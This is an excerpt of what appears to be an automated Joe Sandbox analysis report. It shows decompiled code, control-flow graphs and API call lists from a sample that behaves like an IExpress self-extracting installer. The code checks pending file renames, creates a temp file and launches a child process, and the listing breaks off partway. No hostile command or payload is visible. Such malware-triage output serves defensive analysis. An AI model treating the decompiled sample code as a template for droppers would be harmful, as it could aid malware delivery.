                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                • API String ID: 1979080616-4185119251
                                                                                                                                                                                                                                                • Opcode ID: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                                                                                                                                                                                                                                                • Instruction ID: 9b9a80047c23990354c4d8017fe03c868fc2a731c7b6f9888b3d664ad6fec8d0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a1ea6c6e6ea6caf80fccfc256f5edd9b8762e3fec6cb53d432a369abab55730
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA313876B002019FDB249B3B9C1C5BE7BEAAB9570CF0448AEE5C2C7644DA75CA018B90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 519 10e256d-10e257d 520 10e2622-10e2627 call 10e24e0 519->520 521 10e2583-10e2589 519->521 528 10e2629-10e262f 520->528 523 10e258b 521->523 524 10e25e8-10e2607 RegOpenKeyExA 521->524 523->528 529 10e2591-10e2595 523->529 525 10e2609-10e2620 RegQueryInfoKeyA 524->525 526 10e25e3-10e25e6 524->526 530 10e25d1-10e25dd RegCloseKey 525->530 526->528 529->528 531 10e259b-10e25ba RegOpenKeyExA 529->531 530->526 531->526 532 10e25bc-10e25cb RegQueryValueExA 531->532 532->530
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E010E256D(signed int __ecx) {
                                                                                                                                                                                                                                                				int _v8;
                                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                                				signed int _t13;
                                                                                                                                                                                                                                                				signed int _t19;
                                                                                                                                                                                                                                                				long _t24;
                                                                                                                                                                                                                                                				void* _t26;
                                                                                                                                                                                                                                                				int _t31;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                                				_t31 = 0;
                                                                                                                                                                                                                                                				if(_t13 == 0) {
                                                                                                                                                                                                                                                					_t31 = E010E24E0(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t34 = _t13 - 1;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                                							goto L7;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                                							goto L6;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L12:
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                                							if(_t24 == 0) {
                                                                                                                                                                                                                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                                								L6:
                                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                                								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                                								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							_t31 = _v8;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t31;
                                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010E4096,00000000,00000000,00000000,00000000,?,010E1ED3,00000001,00000000), ref: 010E261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010E25F5
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 010E25C3
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 010E25A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                                                                                                                                                                                                                                                • Instruction ID: d49b77bffc8b3a3f50410c9e8e88aa2efa433491c4373ba15a07496f1dd30b04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90116335902228FFDB20DB979C0DDFF7EFCEB056A1F114195B989A2000D6714A44D6A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 533 10e6a60-10e6a91 call 10e7155 call 10e7208 GetStartupInfoW 539 10e6a93-10e6aa2 533->539 540 10e6abc-10e6abe 539->540 541 10e6aa4-10e6aa6 539->541 544 10e6abf-10e6ac5 540->544 542 10e6aaf-10e6aba Sleep 541->542 543 10e6aa8-10e6aad 541->543 542->539 543->544 545 10e6ac7-10e6acf _amsg_exit 544->545 546 10e6ad1-10e6ad7 544->546 547 10e6b0b-10e6b11 545->547 548 10e6ad9-10e6ae9 call 10e6c3f 546->548 549 10e6b05 546->549 551 10e6b2e-10e6b30 547->551 552 10e6b13-10e6b24 _initterm 547->552 553 10e6aee-10e6af2 548->553 549->547 554 10e6b3b-10e6b42 551->554 555 10e6b32-10e6b39 551->555 552->551 553->547 558 10e6af4-10e6b00 553->558 556 10e6b67-10e6b71 554->556 557 10e6b44-10e6b51 call 10e7060 554->557 555->554 560 10e6b74-10e6b79 556->560 557->556 566 10e6b53-10e6b65 557->566 561 10e6c39-10e6c3e call 10e724d 558->561 564 10e6b7b-10e6b7d 560->564 565 10e6bc5-10e6bc8 560->565 570 10e6b7f-10e6b81 564->570 571 10e6b94-10e6b98 564->571 567 10e6bca-10e6bd3 565->567 568 10e6bd6-10e6be3 _ismbblead 565->568 566->556 567->568 572 10e6be9-10e6bed 568->572 573 10e6be5-10e6be6 568->573 570->565 574 10e6b83-10e6b85 570->574 575 10e6b9a-10e6b9e 571->575 576 10e6ba0-10e6ba2 571->576 572->560 579 10e6c1e-10e6c25 572->579 573->572 574->571 580 10e6b87-10e6b8a 574->580 577 10e6ba3-10e6bbc call 10e2bfb 575->577 576->577 577->579 586 10e6bbe-10e6bbf exit 577->586 582 10e6c27-10e6c2d _cexit 579->582 583 10e6c32 579->583 580->571 584 10e6b8c-10e6b92 580->584 582->583 583->561 584->574 586->565
                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
signed int* _t25;
signed int _t26;
signed int _t29;
int _t30;
signed int _t37;
signed char _t41;
signed int _t53;
signed int _t54;
intOrPtr _t56;
signed int _t58;
signed int _t59;
intOrPtr* _t60;
void* _t62;
void* _t67;
void* _t68;

E010E7155();
_push(0x58);
_push(0x10e72b8);
E010E7208(__ebx, __edi, __esi);
 *(_t62 - 0x20) = 0;
GetStartupInfoW(_t62 - 0x68);
 *((intOrPtr*)(_t62 - 4)) = 0;
_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
_t53 = 0;
while(1) {
	asm("lock cmpxchg [edx], ecx");
	if(0 == 0) {
		break;
	}
	if(0 != _t56) {
		Sleep(0x3e8);
		continue;
	} else {
		_t58 = 1;
		_t53 = 1;
	}
	L7:
	_t67 =  *0x10e88b0 - _t58; // 0x2
	if(_t67 != 0) {
		__eflags =  *0x10e88b0; // 0x2
		if(__eflags != 0) {
			 *0x10e81e4 = _t58;
			goto L13;
		} else {
			 *0x10e88b0 = _t58;
			_t37 = E010E6C3F(0x10e10b8, 0x10e10c4); // executed
			__eflags = _t37;
			if(__eflags == 0) {
				goto L13;
			} else {
				 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
				_t30 = 0xff;
			}
		}
	} else {
		_push(0x1f);
		L010E6FF4();
		L13:
		_t68 =  *0x10e88b0 - _t58; // 0x2
		if(_t68 == 0) {
			_push(0x10e10b4);
			_push(0x10e10ac);
			L010E7202();
			 *0x10e88b0 = 2;
		}
		if(_t53 == 0) {
			 *0x10e88ac = 0;
		}
		_t71 =  *0x10e88b4;
		if( *0x10e88b4 != 0 && E010E7060(_t71, 0x10e88b4) != 0) {
			_t60 =  *0x10e88b4; // 0x0
			 *0x10ea288(0, 2, 0);
			 *_t60();
		}
		_t25 = __imp___acmdln; // 0x74895b9c
		_t59 =  *_t25;
		 *(_t62 - 0x1c) = _t59;
		_t54 =  *(_t62 - 0x20);
		while(1) {
			_t41 =  *_t59;
			if(_t41 > 0x20) {
				goto L32;
			}
			if(_t41 != 0) {
				if(_t54 != 0) {
					goto L32;
				} else {
					while(_t41 != 0 && _t41 <= 0x20) {
						_t59 = _t59 + 1;
						 *(_t62 - 0x1c) = _t59;
						_t41 =  *_t59;
					}
				}
			}
			__eflags =  *(_t62 - 0x3c) & 0x00000001;
			if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
				_t29 = 0xa;
			} else {
				_t29 =  *(_t62 - 0x38) & 0x0000ffff;
			}
			_push(_t29);
			_t30 = E010E2BFB(0x10e0000, 0, _t59); // executed
			 *0x10e81e0 = _t30;
			__eflags =  *0x10e81f8;
			if( *0x10e81f8 == 0) {
				exit(_t30); // executed
				goto L32;
			}
			__eflags =  *0x10e81e4;
			if( *0x10e81e4 == 0) {
				__imp___cexit();
				_t30 =  *0x10e81e0; // 0x0
			}
			 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
			goto L40;
			L32:
			__eflags = _t41 - 0x22;
			if(_t41 == 0x22) {
				__eflags = _t54;
				_t15 = _t54 == 0;
				__eflags = _t15;
				_t54 = 0 | _t15;
				 *(_t62 - 0x20) = _t54;
			}
			_t26 = _t41 & 0x000000ff;
			__imp___ismbblead(_t26);
			__eflags = _t26;
			if(_t26 != 0) {
				_t59 = _t59 + 1;
				__eflags = _t59;
				 *(_t62 - 0x1c) = _t59;
			}
			_t59 = _t59 + 1;
			 *(_t62 - 0x1c) = _t59;
		}
	}
	L40:
                                                                                                                                                                                                                                                					return E010E724D(_t30);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t58 = 1;
                                                                                                                                                                                                                                                				__eflags = 1;
                                                                                                                                                                                                                                                				goto L7;
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                0x010e6c3e
                                                                                                                                                                                                                                                0x010e6c3e
                                                                                                                                                                                                                                                0x010e6abe
                                                                                                                                                                                                                                                0x010e6abe
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetCurrentProcessId.KERNEL32 ref: 010E7191
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetCurrentThreadId.KERNEL32 ref: 010E719A
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: GetTickCount.KERNEL32 ref: 010E71A3
                                                                                                                                                                                                                                                  • Part of subcall function 010E7155: QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                                                                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,010E72B8,00000058), ref: 010E6A7F
                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 010E6AB4
                                                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 010E6AC9
                                                                                                                                                                                                                                                • _initterm.MSVCRT ref: 010E6B1D
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 010E6B49
                                                                                                                                                                                                                                                • exit.KERNELBASE ref: 010E6BBF
                                                                                                                                                                                                                                                • _ismbblead.MSVCRT ref: 010E6BDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836923961-0
                                                                                                                                                                                                                                                • Opcode ID: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                                                                                                                                                                                                                                                • Instruction ID: 1abba974472e59e35631f0bba7cf7dfe9aa5dc7316f4ea2784cfc9b2f2562fd7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E141C735A44365CFDF719B6FF90C76E7BE4AB54B10F14415EE9C19B280CB7A84808B80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 587 10e58c8-10e58d5 588 10e58d8-10e58dd 587->588 588->588 589 10e58df-10e58f1 LocalAlloc 588->589 590 10e5919-10e5959 call 10e1680 call 10e658a CreateFileA LocalFree 589->590 591 10e58f3-10e5901 call 10e44b9 589->591 594 10e5906-10e5910 call 10e6285 590->594 601 10e595b-10e596c CloseHandle GetFileAttributesA 590->601 591->594 600 10e5912-10e5918 594->600 601->594 602 10e596e-10e5970 601->602 602->594 603 10e5972-10e597b 602->603 603->600
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E010E58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				signed char _t16;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				intOrPtr* _t27;
                                                                                                                                                                                                                                                				CHAR* _t33;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                                                                				_t27 = __ecx;
                                                                                                                                                                                                                                                				_t23 = __ecx + 1;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t6 =  *_t27;
                                                                                                                                                                                                                                                					_t27 = _t27 + 1;
                                                                                                                                                                                                                                                				} while (_t6 != 0);
                                                                                                                                                                                                                                                				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                                				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                                				if(_t20 != 0) {
                                                                                                                                                                                                                                                					E010E1680(_t20, _t36, _t33);
                                                                                                                                                                                                                                                					E010E658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                                					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                                					_v8 = _t10;
                                                                                                                                                                                                                                                					LocalFree(_t20);
                                                                                                                                                                                                                                                					_t12 = _v8;
                                                                                                                                                                                                                                                					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						CloseHandle(_t12);
                                                                                                                                                                                                                                                						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                                						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							 *0x10e9124 = 0;
                                                                                                                                                                                                                                                							_t14 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                                					 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                					_t14 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t14;
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                0x010e597a
                                                                                                                                                                                                                                                0x010e596c
                                                                                                                                                                                                                                                0x010e58f3
                                                                                                                                                                                                                                                0x010e5901
                                                                                                                                                                                                                                                0x010e5906
                                                                                                                                                                                                                                                0x010e590b
                                                                                                                                                                                                                                                0x010e5910
                                                                                                                                                                                                                                                0x010e5910
                                                                                                                                                                                                                                                0x010e5918

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E58E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 010E5963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-3705647674
                                                                                                                                                                                                                                                • Opcode ID: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                                                                                                                                                                                                                                                • Instruction ID: 9ca697ab06736a231533094b8cfa5b77cc717e1bc5258c7ce378bb753055aecc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50112671700211AFD7345E7B6C4CADB7EDDDF8A664B000A59B5C5D72C4CA75D80587A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 631 10e3fef-10e4010 632 10e410a-10e411a call 10e6ce0 631->632 633 10e4016-10e403b CreateProcessA 631->633 634 10e40c4-10e4101 call 10e6285 GetLastError FormatMessageA call 10e44b9 633->634 635 10e4041-10e406e WaitForSingleObject GetExitCodeProcess 633->635 647 10e4106 634->647 637 10e4070-10e4077 635->637 638 10e4091 call 10e411b 635->638 637->638 642 10e4079-10e407b 637->642 646 10e4096-10e40b8 CloseHandle * 2 638->646 642->638 645 10e407d-10e4089 642->645 645->638 648 10e408b 645->648 649 10e40ba-10e40c0 646->649 650 10e4108 646->650 647->650 648->638 649->650 651 10e40c2 649->651 650->632 651->647
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E010E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v524;
                                                                                                                                                                                                                                                				long _v528;
                                                                                                                                                                                                                                                				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t20;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				int _t25;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t45 = __edx;
                                                                                                                                                                                                                                                				_t20 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                                                                				_t49 = 1;
                                                                                                                                                                                                                                                				_t22 = 0;
                                                                                                                                                                                                                                                				if(__ecx == 0) {
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return E010E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                                					 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                                					_t45 = 0x4c4;
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					_t49 = 0;
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t22 = _t49;
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                                				_t44 = _v528;
                                                                                                                                                                                                                                                				_t53 =  *0x10e8a28; // 0x0
                                                                                                                                                                                                                                                				if(_t53 == 0) {
                                                                                                                                                                                                                                                					_t34 =  *0x10e9a2c; // 0x0
                                                                                                                                                                                                                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                                							 *0x10e9a2c = _t44;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E010E411B(_t34, _t44);
                                                                                                                                                                                                                                                				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                                				CloseHandle(_v544);
                                                                                                                                                                                                                                                				if(( *0x10e9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010E4033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010E4049
